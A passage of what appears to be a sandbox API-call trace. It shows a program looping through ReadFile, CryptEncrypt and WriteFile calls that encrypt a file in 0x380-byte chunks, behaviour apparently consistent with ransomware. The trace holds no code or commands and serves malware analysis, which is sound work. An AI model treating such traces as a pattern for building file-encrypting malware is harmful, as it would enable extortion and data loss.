[0271.289] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.298] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.300] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.300] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.301] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.302] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.303] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.304] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.305] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.306] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, 